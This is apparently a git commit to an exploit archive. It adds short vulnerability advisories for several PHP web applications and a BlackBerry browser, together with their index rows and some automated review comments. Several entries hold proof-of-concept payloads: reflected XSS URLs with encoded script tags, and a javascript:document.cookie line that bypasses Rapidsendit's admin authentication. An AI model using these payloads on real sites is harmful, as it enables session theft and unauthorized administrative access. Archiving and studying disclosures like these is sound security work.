From 66d3c41613cae58b9d4c1674d1a604ab9091966b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 30 Sep 2014 04:44:44 +0000
Subject: [PATCH] Updated 09_30_2014
---
 files.csv | 7 +++++++
 platforms/hardware/remote/34802.html | 29 ++++++++++++++++++++++++++++
 platforms/php/webapps/34803.txt | 9 +++++++++
 platforms/php/webapps/34804.txt | 10 ++++++++++
 platforms/php/webapps/34805.txt | 8 ++++++++
 platforms/php/webapps/34806.txt | 9 +++++++++
 platforms/php/webapps/34807.txt | 9 +++++++++
 platforms/php/webapps/34808.txt | 10 ++++++++++
 8 files changed, 91 insertions(+)
 create mode 100755 platforms/hardware/remote/34802.html
 create mode 100755 platforms/php/webapps/34803.txt
 create mode 100755 platforms/php/webapps/34804.txt
 create mode 100755 platforms/php/webapps/34805.txt
 create mode 100755 platforms/php/webapps/34806.txt
 create mode 100755 platforms/php/webapps/34807.txt
 create mode 100755 platforms/php/webapps/34808.txt
diff --git a/files.csv b/files.csv
index 5b04ec274..4df92cca8 100755
--- a/files.csv
+++ b/files.csv
@@ -31331,3 +31331,10 @@ id,file,description,date,author,platform,type,port
 34796,platforms/multiple/remote/34796.txt,"Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0
 34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0
 34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability˛",2010-10-04,"Eugene Salov",php,webapps,0
+34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software <= 4.7.1 Cross Domain Information Disclosure Vulnerability",2010-10-04,"599eme Man",hardware,remote,0
+34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 'ogp_show.php' Cross Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0
+34804,platforms/php/webapps/34804.txt,"Rentventory 'index.php' Multiple Cross Site Scripting Vulnerabilities",2009-07-07,"599eme Man",php,webapps,0
+34805,platforms/php/webapps/34805.txt,"StatsCode Multiple Cross Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps,0
+34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 'index.php' Cross Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0
+34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 'vote.php' Cross Site Scripting Vulnerability",2009-07-08,Moudi,php,webapps,0
+34808,platforms/php/webapps/34808.txt,"Rapidsendit Clone Script 'admin.php' Insecure Cookie Authentication Bypass Vulnerability",2009-07-08,NoGe,php,webapps,0
diff --git a/platforms/hardware/remote/34802.html b/platforms/hardware/remote/34802.html
new file mode 100755
index 000000000..05a0a29bd
--- /dev/null
+++ b/platforms/hardware/remote/34802.html
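Review bot: The added rows in files.csv start at id 34802 while the last context row is 34798, so ids 34799–34801 have no row in this hunk and no file elsewhere in the commit. If those ids are reserved or withdrawn that is fine, but it is worth confirming the gap is intentional, since anything that consumes the index may assume one row per id. The six webapps rows (34803–34808) are also dated 2009-07 although their source BIDs (43689–43702) sit right after 43685, which the index dates 2010-10-04; the dates may be correct discovery dates, but they look worth a second check.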
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/43685/info
+
+Research In Motion BlackBerry Device Software is prone to a cross-domain information-disclosure vulnerability because the application's web browser fails to properly enforce the same-origin policy.
+
+An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks.
+
+# [+] BlackBerry Browser Cross Origin Bypass
+#
+# [+] Author : 599eme Man
+# [+] Contact : Flouf@live.fr
+#
+#[------------------------------------------------------------------------------------]
+#
+# [+] How use ?
+#
+# The Cross Origin Bypass is a way to bypass the domain's restrictions, you can execute javascript throught your domain on other domain, so you can get visitor's cookie throught your website.
+#
+# [+] PoC :
+#
+# Create a file.htm, save it with this code below and upload it on your server.
+#
+#
+# Test me
+#
diff --git a/platforms/php/webapps/34803.txt b/platforms/php/webapps/34803.txt
new file mode 100755
index 000000000..77aada3de
--- /dev/null
+++ b/platforms/php/webapps/34803.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43689/info
+
+Online Guestbook Pro is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Online Guestbook Pro 5.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/patch/ogp_show.php?display=[nm]&sort=&entry=[XSS]&search=&search_choice==
\ No newline at end of file
diff --git a/platforms/php/webapps/34804.txt b/platforms/php/webapps/34804.txt
new file mode 100755
index 000000000..a8c8062a5
--- /dev/null
+++ b/platforms/php/webapps/34804.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/43692/info
+
+Rentventory is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+Rentventory 1.0.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?Login=
+http://www.example.com/index.php?Password=
diff --git a/platforms/php/webapps/34805.txt b/platforms/php/webapps/34805.txt
new file mode 100755
index 000000000..32b97fb95
--- /dev/null
+++ b/platforms/php/webapps/34805.txt
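Review bot: `new file mode 100755` on platforms/hardware/remote/34802.html marks an HTML/text sample as executable, and the same mode is used for 34803.txt through 34808.txt in this commit; none of these is a program, so `100644` would be the safer mode for archived samples. Separately, the advisory text in 34802.html never states the affected version, while its files.csv row says `<= 4.7.1`; a line such as `BlackBerry Device Software 4.7.1 and earlier are affected.` would keep the entry and the index in agreement. Because the file carries an .html extension but opens with plain advisory prose, it may also be worth noting in the entry that it should be viewed as text rather than opened in a browser.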
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/43693/info
+
+StatsCode is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Login : '>
+Password : '>
diff --git a/platforms/php/webapps/34806.txt b/platforms/php/webapps/34806.txt
new file mode 100755
index 000000000..533e34b6a
--- /dev/null
+++ b/platforms/php/webapps/34806.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43697/info
+
+JNM Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+JNM Guestbook 3.0 is vulnerable; other versions may also be affected.
+
+ http://www.example.com/scripts/guestbook/test2/?page=1%3E%27%3E%3CScRiPt%20%0A%0D%3Ealert(309018679930)%3B%3C/ScRiPt%3E&order=asc
\ No newline at end of file
diff --git a/platforms/php/webapps/34807.txt b/platforms/php/webapps/34807.txt
new file mode 100755
index 000000000..29d0aec59
--- /dev/null
+++ b/platforms/php/webapps/34807.txt
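Review bot: 34805.txt gives no affected version and does not name the page that takes the `Login` and `Password` fields, unlike the other webapps entries in this commit, which each carry a line of the form `<product> <version> is vulnerable; other versions may also be affected.`. Without it an operator cannot tell whether their installation is in scope, and the files.csv row for 34805 gives no version either. If the source advisory states none, saying so explicitly, e.g. `Affected versions: not specified by the source advisory.`, is better than leaving it out.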
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43699/info
+
+JNM Solutions DB Top Sites is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+JNM Solutions DB Top Sites 1.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/topsites/vote.php?u=RGVtb24=1%3E%27%3E%3CScRiPt%20%0A%0D%3Ealert(314888759311)%3B%3C/ScRiPt%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34808.txt b/platforms/php/webapps/34808.txt
new file mode 100755
index 000000000..756138d8c
--- /dev/null
+++ b/platforms/php/webapps/34808.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/43702/info
+
+Rapidsendit Clone Script is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
+
+Attackers can exploit this vulnerability to gain administrative access to the affected application; this may aid in further attacks.
+
+Rapidsendit Clone Script 2.1 and prior are vulnerable.
+
+javascript:document.cookie="logged=696d29e0940a4957748fe3fc9efd22a3; path=/";
+696d29e0940a4957748fe3fc9efd22a3 = password
\ No newline at end of file
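Review bot: The last line of 34808.txt, `696d29e0940a4957748fe3fc9efd22a3 = password`, does not say whether that value is a constant shipped with the script or specific to one installation, which is what an operator needs to know to judge their exposure. From the description, the application appears to treat a client-set `logged` cookie as proof of an administrative login, but the entry stops at the symptom and offers no remediation. A closing line such as `Fix: track the admin login in a server-side session instead of trusting the value of the logged cookie.` would make the entry usable for defenders, and it should be checked against the vendor's fix if one exists.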